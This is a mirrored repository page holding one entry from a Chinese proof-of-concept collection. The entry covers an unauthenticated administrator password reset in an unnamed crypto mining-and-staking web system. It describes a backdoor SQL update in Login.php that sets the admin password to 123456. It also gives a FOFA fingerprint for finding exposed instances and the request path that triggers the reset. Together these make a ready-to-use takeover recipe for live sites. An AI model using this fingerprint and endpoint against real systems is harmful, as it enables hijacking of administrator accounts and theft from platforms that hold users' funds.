crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/某U挖矿质押单语言系统前台未授权修改管理员密码.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

510 B
Raw Blame History

某U挖矿质押单语言系统前台未授权修改管理员密码

位于 /admin/controller/Login.php 有个很明显操纵SQL的update操作重置了管理员的密码为123456且未设置鉴权非常明显是个后门

fofa

"/static/index/css/login/framework7.ios.min.css"

poc

/admin/login/setpassword

图片

漏洞来源